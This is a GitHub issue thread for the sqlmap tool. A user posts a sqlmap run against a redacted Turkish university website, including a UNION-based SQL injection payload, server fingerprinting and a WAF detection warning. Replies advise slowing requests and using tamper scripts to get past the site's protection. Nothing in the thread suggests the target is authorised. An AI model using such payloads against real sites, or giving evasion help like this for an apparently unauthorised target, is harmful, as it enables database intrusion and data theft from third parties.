### ISSUE TITLE
[WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 1 times

### ISSUE THREAD

**Issue by poyrazzers** [sqlmapproject/sqlmap#2523]
### root@poyrazzers:~# sqlmap -u http://xxx.xxx.edu.tr/xxx.asp?xxx=1 --dbs
[*] starting at 15:29:07

### [15:29:07] [INFO] resuming back-end DBMS 'microsoft access' 
[15:29:07] [INFO] testing connection to the target URL
[15:29:08] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[15:29:08] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: xxx (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: xxx=1 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(106)&CHR(112)&CHR(113)&CHR(113)&CHR(102)&CHR(122)&CHR(100)&CHR(118)&CHR(120)&CHR(68)&CHR(77)&CHR(87)&CHR(106)&CHR(68)&CHR(77)&CHR(69)&CHR(101)&CHR(108)&CHR(75)&CHR(100)&CHR(114)&CHR(108)&CHR(104)&CHR(107)&CHR(106)&CHR(70)&CHR(120)&CHR(111)&CHR(105)&CHR(73)&CHR(97)&CHR(118)&CHR(107)&CHR(112)&CHR(82)&CHR(104)&CHR(75)&CHR(107)&CHR(80)&CHR(75)&CHR(118)&CHR(116)&CHR(107)&CHR(106)&CHR(113)&CHR(118)&CHR(112)&CHR(107)&CHR(113),NULL FROM MSysAccessObjects%16
### ---
[15:29:08] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[15:29:08] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[15:29:08] [INFO] fetched data logged to text files under '/root/.sqlmap/output/xxx.xxx.edu.tr'

Not working, help me please

**Comment by klensy** [comment]
sqlmap version?
Try slow down requests with [```--delay```](https://github.com/sqlmapproject/sqlmap/wiki/Usage#delay-between-each-http-request).

**Comment by poyrazzers** [comment]
I will try, thanks

7 May 2017 19:09 tarihinde "klensy" <notifications@github.com> yazdı:

**Comment by stamparm** [comment]
`[CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS` -> https://github.com/sqlmapproject/sqlmap/wiki/FAQ#which-tamper-script-to-use-to-bypass-a-wafidsips-protection
